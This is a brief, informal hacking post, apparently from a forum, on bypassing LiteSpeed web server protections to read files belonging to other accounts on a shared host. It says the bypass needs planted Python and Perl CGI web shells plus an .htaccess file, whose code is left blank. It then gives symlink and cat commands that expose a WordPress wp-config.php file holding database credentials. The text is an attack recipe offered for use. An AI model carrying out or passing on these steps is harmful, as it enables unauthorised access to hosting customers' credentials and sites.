Bypass lite speed , we all know the security of lite speed and the 403 error when u want to read files u have been do sym to >
so , i bypassed today , i think it's a new way
all what we need is
python shell , CGI PERL Shell
and .htaccess
the htaccess code is

and do sym
ln -s /home/user/public_html/wp-config.php 1.txt
then
cat 1.txt
u will see the config file
